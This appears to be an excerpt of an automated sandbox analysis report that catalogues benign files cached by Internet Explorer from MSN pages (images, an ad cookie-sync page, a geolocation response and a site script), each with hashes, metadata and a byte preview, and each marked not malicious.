Preview:	......JFIF.....`.`.....C................!.....(...!021/.-4;K@48G9-.BYBGNPTUT3?]c\RbKSTQ...C.......'..'Q6.6QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ......p.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..(.(..a.z8..L..(.....?.(.A....v...9..%.(...Rg...v...(.{.Lq........9...u..N.w..f..N.f.z...K.1IL.=(.....QE....PM.b..(....J_.(...L...h..b..u...JZ=h..Q.O.KH..v.R.n..e.AW..QW..:..&......[I...\|....r.M.....V'4...sT..?....nO.5.hV.2.E?\.....+^}.t....m5.5..>....Zi.+..zQ.G.qL...E..g.i../....~.{....QH..GZNqE..h....^..g.4...C...P.O<.E%..}..E...-....I.AA4.@8..=

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\BB1fn9kQ[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3
Category:	downloaded
Size (bytes):	6633
Entropy (8bit):	7.916201121050477
Encrypted:	false
SSDEEP:	192:7anYoMHUJt3CrONyofXG2tVRX6LRY9CI8gC6F:7aYoYK2EWYRiI8d6F
MD5:	977C2626EF65A413BB8BC2708A8E2564
SHA1:	458492660D4802DDEAADDC7385F815265699D5B6
SHA-256:	3098183D64EC37833736D20C6713BAC48EB461588EF7F9C9DF4F756146630CBC
SHA-512:	FBEB1D1D78CCB3E2E0773C9EF9378BA64F6B1A59755A47D30407842F0DC3FACB0736976AD7C602989635CE786325835498F3E95265D3C206D6E4110EB709CB7D
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1fn9kQ.img?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jpg&x=417&y=266
Preview:	......JFIF.....`.`.....C................!.....(...!021/.-4;K@48G9-.BYBGNPTUT3?]c\RbKSTQ...C.......'..'Q6.6QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ........6.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...1N..k.<...)@..7.b...N.J...F..:SJ....1S..iZw...F).h....1O..].\,G.\S..&)............b...)...R.[......8.\...HI.....K...!.*......cl..(....k#...r.N...t...G...c.V..6K..DU}rk.......<dW#....nG...';I...5....5.qh..6.~h...A.s.......y..M..'?.[.u6.B.r...]]...............)..ZB..F5(.....VV.;..y[q...+Z..K.\....f&(.:.U.7.S.F(.....m+.a....h.p...m>.61K....b.9.R...J.<.b.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\BB1fnBOz[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	14126
Entropy (8bit):	7.954209870390235
Encrypted:	false
SSDEEP:	384:6JaULWgbsjyQT98sViiaC7q5oWRCT781y8+NOyN+g:6J9LWgQjLTXdaCe59CP81y8+NOyj
MD5:	01A2BE6AF3841DC9E516CE378E4B29D5
SHA1:	D36EB904CE114435C223ABAE5673E7C0F5606EBE
SHA-256:	C1EF579CB774832C707FDD781FEF5060F006C8D488CFA88F8555E2907614192E
SHA-512:	23383E59F10210C51026B30E664ACBAB8444B9A308E53E1002EE0DA279DE0EC4C267588F5D9F784B62E665EE1F42D84DCCBA723188E6FD4E43D010E42466ECFB
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1fnBOz.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=492&y=239
Preview:	......JFIF.....`.`.....C................!.....(...!021/.-4;K@48G9-.BYBGNPTUT3?]c\RbKSTQ...C.......'..'Q6.6QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..j(.....(.A.;u0R...R.P.KI...(...(...(...(....(. ..Z..QO.)&.G..s....6.WAc.p..M..'_.-t.K..P.}H...K.F.'..Egu6.V.8..j....3.V....r".._..OE..O9........!...U..sU...z..2.T.....x...9...&Xn...+....6M..Oe~G.X.6..I.x.......9.NQ..ZJ.0..1L..\Q@..Q@..E...)(.........J(.......QI@.E.P.E...QE%1.E.P.J))......1.......[..C.r.z(..N..d+..9....d..,+....j....z....+..U.U..NA.;t..08......

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\BB1fnHHU[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x250, frames 3
Category:	downloaded
Size (bytes):	16987
Entropy (8bit):	7.959808691824645
Encrypted:	false
SSDEEP:	384:NVLCaanYrr7E+5XsuXkvdsArxl0lJF6flbL:NnanYrLXcvZn0lJwh
MD5:	E55661CE2EECDF0028F73AD03FBDE66E
SHA1:	0268F6AB07FAF4FDFC2B7CE4E34BCD2ACCD7DC2D
SHA-256:	D6BEB01BD57DDB111B0B6411CB7A3996A7E53C7AE7E0AEDCD14EA369AF7D1A2D
SHA-512:	5738B541C7F2F3C8B81FB156588C10D95DD60F6474F1859BC692BB2E7D9E41835D45C3C59FFAB24FE0A7929A80719D1C8BFDF88D42296A70A819067F3B8FAA43
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1fnHHU.img?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jpg&x=486&y=73
Preview:	......JFIF.....`.`.....C................!.....(...!021/.-4;K@48G9-.BYBGNPTUT3?]c\RbKSTQ...C.......'..'Q6.6QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ........,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..:e...[.<......O..x..:dQ..q..bi.ZA.....:}*.M.SW...u!t..+....9....Z.:...........^O..m.I?Z.\|.n..7Gq.B..F.w....O$sR..X. (..T.R...g.....1.>.~uW..tR.F(....is.Ey2.6.UV..V<..\.............Z./.._....F..^`.>.@..8..{..F.6.S.+..i.w......>..,.c.w5,.>....=q@......rE$DA...?...$RD........m.%FXg.i.q.H.9.H.H.S.v.%.....@.2U.....(#%...>.H.\...".l6(f#.q.K\|.l.u..BFh.+Q..Q.H.?.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\BB1fnJON[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	downloaded
Size (bytes):	35686
Entropy (8bit):	7.959286492191627
Encrypted:	false
SSDEEP:	768:PRuT5ETK6qAntIMyYAVQyQhFccjOWnvFGGjyfR221fV5:PsdETK0t17/yxwdfyE2F
MD5:	5EB493EE75E0F4CF1DDB64ED71E64D7E
SHA1:	6838673A034C12B456CA706A8704CCDD9D2340F4
SHA-256:	9F5C9571425D539326100A29EE562B854DB0FEEC458D3C307BC8D6983EDBB3F8
SHA-512:	7BB4F3468E725995FEFF03AD0C092DE26878585B42DF1380D34FBE5F54ECB6A8D47FD247C6D7EE1EB27AE1252E6981A4DF45A3FD33615F0F51E09015907D41A2
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1fnJON.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg&x=2124&y=1772
Preview:	......JFIF.....`.`.....C................!.....(...!021/.-4;K@48G9-.BYBGNPTUT3?]c\RbKSTQ...C.......'..'Q6.6QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ......p.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....@...b..P.QK.(....P.RS....N...&(.-...................Q@....P.b...Q..JLS.E0..1N.%.&(.-...b...m..QH..N.&(.(........b..E.(..QKE.%..P.QKI@.)1KE...b...LQ.Z(..S....KK..m......R.P.QK.1@.E-.......LQKE.%.QL.....LQ.Z(.1E-..f.\P.fP.R.@...b..Z1@.E.P.E.P.b.R.@..1KE.%..P.RS...7.b..LP.QK.1@.E-...Z(....u&(..E.(.;.......\....Qp.E:....R..LQ.\Q@....RP.b.R.@.IN....QN...%......R.P.RS.E

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\BB1fnP0A[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x250, frames 3
Category:	downloaded
Size (bytes):	11119
Entropy (8bit):	7.947729085804857
Encrypted:	false
SSDEEP:	192:NRMQJjLzf8I/HkOkmTIUAMOKCp805BhuDrAiAvNBOf/8Q2hQzeJGdpYG3GFWGEEu:NRMaLzfhkUS8ghuDrYyH8Q2+eJGdn3zn
MD5:	51542413D067B99009669D457F22A302
SHA1:	45CEA35E80E286E809C1FE3101ECA09892C53C4A
SHA-256:	DE4173BCB08D29D7C00C45955564D6B4AEC9F976305492B9D587BC10172FBA49
SHA-512:	6C4EFF685CB92EEE94D5B146AB62C3968756404C0E201097F8001DC8EE48D231E9CA7CFB519F4BCD639E9009CDFBE12CE25BC9E368EEB29F561C607205BA41BA
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1fnP0A.img?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....`.`.....C................!.....(...!021/.-4;K@48G9-.BYBGNPTUT3?]c\RbKSTQ...C.......'..'Q6.6QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ........,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....R.T..@....3.....[.xV..p4R..Jh....@..JZ.(...(...(....IA.C.Kd.P.^6.2.......#..E.`n..'aE...JSIR0..)...dE..(.I..\.....R...x.s.z.kF..+..............G...O.k.N.6.......f=.X.P...z.5Q......n...8.X.t./...f.,..nB......^p..q<o....o.}...i..P.YI.`.\.__...9=..h.F]4.x.K.+...A..L..E..%..b....w...c(...8d#pV<.....5.t../...*.v..yE....wD4...A.....6..]..j....>....O...G....X...;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\BB1fnhpM[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
Category:	downloaded
Size (bytes):	1523
Entropy (8bit):	7.6248330535876105
Encrypted:	false
SSDEEP:	24:zo0XxDuLHeOWXG4OZ7DAJuLHenX3dJ55OvoLQyENbRUaIMMI0ObL+7ozF1hJNW3X:cuERABXUoLQrxBIMMKbL+7CDWhXWtf7w
MD5:	864F2954450E4201D10634156E745273
SHA1:	B44B955A08F353CBC7B11FA3B37BBCC222834607
SHA-256:	1350BEEDAEB74CA83E92BB7A576908E11CFFEACDEF0DD1D83091B4369B885FB6
SHA-512:	6EA2E653C3E11388911DB11EC5FEBFB63D29839801146490ECBD26B7AE15840AE86E582D9ABD6B0FE2280567755DE84CF198A26F1E51BB5CF55D02941B33596D
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1fnhpM.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....`.`.....C................!.....(...!021/.-4;K@48G9-.BYBGNPTUT3?]c\RbKSTQ...C.......'..'Q6.6QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ......K.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Nh.'..g.F}I..\R............`.R.+....^(.....'.........F...G.Z.u.u9xm...(.27c...4.C..eQ..U9...s..U<...r.s...7...:..(.;.....N......,.\....u<...3...PI..S.Fh......7S%...YR0H@\..U.........[..0]Ys S.H......r..hF..........l.2...9........KN}..N.s....B@9>...........u<.n.d.fy.4...s.+k.`.=V........0.rqZU..sH..Yb.a6...........o_CU{.%&E&.Fs@.h....).W.F.0..:.:7.Za8.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\BB7hg4[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	334
Entropy (8bit):	6.814254222145816
Encrypted:	false
SSDEEP:	6:6v/lhPkR/C+gI3/1Qoue6wS/6MjHMOuGR0kf1f89ldbi8+8uzoWgVUbp:6v/78/7/1Q1IbO5ltGZp+8uzYU1
MD5:	2EB2549363B1EAFD3002771BD64EE5BF
SHA1:	A90A5B0C4F4F7BA139C800E354853AB011AE1B22
SHA-256:	0D83CDF2BCF15B0DB682E61C5CE95F2FB5565A0F08AFA569E27B639C30DBC7CA
SHA-512:	28C1BC1D5F28AE5BEACD3CE503A5E9BBEC71AC621EDF4275B89B7922078E9C54D86E773F628A27FAB799ED6AB8A3D5ECD517875B63F1E2293A82793C5820C107
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hg4.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....IDAT8O....0.E].......I.*#d.Fa.6`.F`....4@.../..."'.\|......Q......o9./....cLC.]k....f.O.Xk...w5XUUKN..Zw.~..........Ds.)..K.A ./.C.Z. ..8B@D{.D....'.:.0@.1.......H`:..8..?.U....%.H.q." x..fr0m<...1[.c..z.V.k.y.I...L.J}....&.&......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\BBVuddh[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	304
Entropy (8bit):	6.758580075536471
Encrypted:	false
SSDEEP:	6:6v/lhPkR/ChmU5nXyNbWgaviGjZ/wtDi6Xxl32inTvUI8zVp:6v/78/e5nXyNb4lueg32au/
MD5:	245557014352A5F957F8BFDA87A3E966
SHA1:	9CD29E2AB07DC1FEF64B6946E1F03BCC0A73FC5C
SHA-256:	0A33B02F27EE6CD05147D81EDAD86A3184CCAF1979CB73AD67B2434C2A4A6379
SHA-512:	686345FD8667C09F905CA732DB98D07E1D72E7ECD9FD26A0C40FEE8E8985F8378E7B2CB8AE99C071043BCB661483DBFB905D46CE40C6BE70EEF78A2BCDE94605
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........+......IDAT8O...P...3.....v..`0.}...'..."XD.`.`.5.3. ....)...a.-.............d.g.mSC.i..%.8*].}....m.$I0M..u.. ...,9.........i....X..<.y..E..M....q... ."...,5+..]..BP.5.>R....iJ.0.7.\|?.....r.\-Ca......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\a8a064[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 28 x 28
Category:	downloaded
Size (bytes):	16360
Entropy (8bit):	7.019403238999426
Encrypted:	false
SSDEEP:	384:g2SEiHys4AeP/6ygbkUZp72i+ccys4AeP/6ygbkUZaoGBm:g2Tjs4Ae36kOpqi+c/s4Ae36kOaoGm
MD5:	3CC1C4952C8DC47B76BE62DC076CE3EB
SHA1:	65F5CE29BBC6E0C07C6FEC9B96884E38A14A5979
SHA-256:	10E48837F429E208A5714D7290A44CD704DD08BF4690F1ABA93C318A30C802D9
SHA-512:	5CC1E6F9DACA9CEAB56BD2ECEEB7A523272A664FE8EE4BB0ADA5AF983BA98DBA8ECF3848390DF65DA929A954AC211FF87CE4DBFDC11F5DF0C6E3FEA8A5740EF7
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Preview:	GIF89a.......dbd...........lnl.........trt..................!..NETSCAPE2.0.....!.......,..........+..I..8...`(.di.h..l.p,..(.........5H.....!.......,.........dbd...........lnl......dfd....................../..I..8...`(.di.h..l..e.....Q... ..-.3...r...!.......,.........dbd..............tvt...........................*P.I..8...`(.di.h.v.....A<.. ......pH,.A..!.......,.........dbd........\|~\|......trt...ljl.........dfd......................................................B`%.di.h..l.p,.t]S......^..hD..F. .L..tJ.Z..l.080y..ag+...b.H...!.......,.........dbd.............ljl.............dfd........lnl..............................................B.$.di.h..l.p.'J#............9..Eq.l:..tJ......E.B...#.....N...!.......,.........dbd...........tvt.....ljl.......dfd.........\|~\|.............................................D.$.di.h..l.NC.....C...0..)Q..t...L:..tJ.....T..%...@.UH...z.n.....!.......,.........dbd..............lnl.........ljl......dfd...........trt...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\cfdbd9[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	740
Entropy (8bit):	7.552939906140702
Encrypted:	false
SSDEEP:	12:6v/70MpfkExg1J0T5F1NRlYx1TEdLh8vJ542irJQ5nnXZkCaOj0cMgL17jXGW:HMuXk5RwTTEovn0AXZMitL9aW
MD5:	FE5E6684967766FF6A8AC57500502910
SHA1:	3F660AA0433C4DBB33C2C13872AA5A95BC6D377B
SHA-256:	3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
SHA-512:	AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/cfdbd9.png
Preview:	.PNG........IHDR................U....sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS6......tEXtCreation Time.07/21/16.~y....<IDATH..;k.Q....;.;..&..#...4..2.....V,...X..~.{..\|.Cj......B$.%.nb....c1...w.YV....=g.............!..&.$.mI...I.$M.F3.}W,e.%..x.,..c..0.V....W.=0.uv.X...C....3`....s.....c..............2]E0.....M...^i...[..]5.&...g.z5]H....gf....I....u....:uy.8"....5...0.....z.............o.t...G.."....3.H....Y....3..G....v..T....a.&K......,T.\.[..E......?........D........M..9...ek..kP.A.`2.....k...D.}.\...V%.\..vIM..3.t....8.S.P..........9.....yI.<...9.....R.e.!`..-@........+.a..x..0.....Y.m.1..N.I...V.'..;.V..a.3.U....,.1c.-.J<..q.m-1...d.A..d.`.4.k..i.......SL.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\checksync[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	21168
Entropy (8bit):	5.301254840507112
Encrypted:	false
SSDEEP:	384:2nAGcVXlblcqnzleZSug2f5vzJarS5gF3OZOtQWwY4RXrqt:086qhbz2RmF3OstQWwY4RXrqt
MD5:	83FC8D2EAB1DF069A59E8AEF3C72E1F0
SHA1:	C5D0A7734E7D628C7BFF1EFE1496D9BEE55BCDDA
SHA-256:	49E0F86EDD44B74224BE0E75BB24262FFC7EE0FB6701955CE5FE087FB386167F
SHA-512:	703F5B9531D0818100A26ED08908341748F3B5E23CBA38F689FC6B52B62A14A43B4239B80C8ED6046EE352D54FEB2DEA55E3CA91F6E7EC7ECA9332DFD8D65DA3
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":74,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\checksync[2].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	21168
Entropy (8bit):	5.301254840507112
Encrypted:	false
SSDEEP:	384:2nAGcVXlblcqnzleZSug2f5vzJarS5gF3OZOtQWwY4RXrqt:086qhbz2RmF3OstQWwY4RXrqt
MD5:	83FC8D2EAB1DF069A59E8AEF3C72E1F0
SHA1:	C5D0A7734E7D628C7BFF1EFE1496D9BEE55BCDDA
SHA-256:	49E0F86EDD44B74224BE0E75BB24262FFC7EE0FB6701955CE5FE087FB386167F
SHA-512:	703F5B9531D0818100A26ED08908341748F3B5E23CBA38F689FC6B52B62A14A43B4239B80C8ED6046EE352D54FEB2DEA55E3CA91F6E7EC7ECA9332DFD8D65DA3
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":74,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\e151e5[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 1 x 1
Category:	downloaded
Size (bytes):	43
Entropy (8bit):	3.122191481864228
Encrypted:	false
SSDEEP:	3:CUTxls/1h/:7lU/
MD5:	F8614595FBA50D96389708A4135776E4
SHA1:	D456164972B508172CEE9D1CC06D1EA35CA15C21
SHA-256:	7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
SHA-512:	299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Preview:	GIF89a.............!.......,...........D..;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\location[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	164
Entropy (8bit):	4.55341170338059
Encrypted:	false
SSDEEP:	3:LUfGC48HptOE9HhE/fQ8I5CMnRMRU8x4URGQP22/9SM+nmyRHfHO:nCj4ElhEAjvRMmhUMQP2zjO
MD5:	A6B42B0E34A354029688094D2B66EB8A
SHA1:	400B86D37BB8C1F8EC364F98A780D981F1357E92
SHA-256:	6AC51762DD026703234ED9446F010135439C46DC525113BAF9D202F2CE199DBF
SHA-512:	A1096CAA2142AB0F7A1D0899BBBF468D1053D248B61EAD2D8B2F3D63B2CF37570202195D8CDCA0FFD49DEDB9C63588F8EFAF463EB07C640235AD0AF1D70BBBD5
Malicious:	false
IE Cache URL:	https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Preview:	jsonFeed({"country":"CH","state":"","stateName":"","zipcode":"","timezone":"Europe/Zurich","latitude":"47.14490","longitude":"8.15510","city":"","continent":"EU"});

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\17-361657-68ddb2ab[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	1238
Entropy (8bit):	5.066474690445609
Encrypted:	false
SSDEEP:	24:HWwAaHZRRIYfOeXPmMHUKq6GGiqIlQCQ6cQflgKioUInJaqzrQJ:HWwAabuYfO8HTq0xB6XfyNoUiJaD
MD5:	7ADA9104CCDE3FDFB92233C8D389C582
SHA1:	4E5BA29703A7329EC3B63192DE30451272348E0D
SHA-256:	F2945E416DDD2A188D0E64D44332F349B56C49AC13036B0B4FC946A2EBF87D99
SHA-512:	2967FBCE4E1C6A69058FDE4C3DC2E269557F7FAD71146F3CCD6FC9085A439B7D067D5D1F8BD2C7EC9124B7E760FBC7F25F30DF21F9B3F61D1443EC3C214E3FFF
Malicious:	false
Preview:	define("meOffice",["jquery","jqBehavior","mediator","refreshModules","headData","webStorage","window"],function(n,t,i,r,u,f,e){function o(t,o){function v(n){var r=e.localStorage,i,t,u;if(r&&r.deferLoadedItems)for(i=r.deferLoadedItems.split(","),t=0,u=i.length;t<u;t++)if(i[t]&&i[t].indexOf(n)!==-1){f.removeItem(i[t]);break}}function a(){var i=t.find("section li time");i.each(function(){var t=new Date(n(this).attr("datetime"));t&&n(this).html(t.toLocaleString())})}function p(){c=t.find("[data-module-id]").eq(0);c.length&&(h=c.data("moduleId"),h&&(l="moduleRefreshed-"+h,i.sub(l,a)))}function y(){i.unsub(o.eventName,y);r(s).done(function(){a();p()})}var s,c,h,l;return u.signedin\|\|(t.hasClass("office")?v("meOffice"):t.hasClass("onenote")&&v("meOneNote")),{setup:function(){s=t.find("[data-module-deferred-hover], [data-module-deferred]").not("[data-sso-dependent]");s.length&&s.data("module-deferred-hover")&&s.html("<p class='meloading'><\/p>");i.sub(o.eventName,y)},teardown:function(){h&&i.un

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\AAyXtPP[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	579
Entropy (8bit):	7.242449744338181
Encrypted:	false
SSDEEP:	12:6v/78/soNLIfYAW3bGnL/4DoQduE1TjLcHlrtw9qO50P1:phCLGhe1
MD5:	21DAEBDC009FDB9D1101F7E31251D647
SHA1:	CEE8363244EC691AB7C79F1C8D3D2320F5805D66
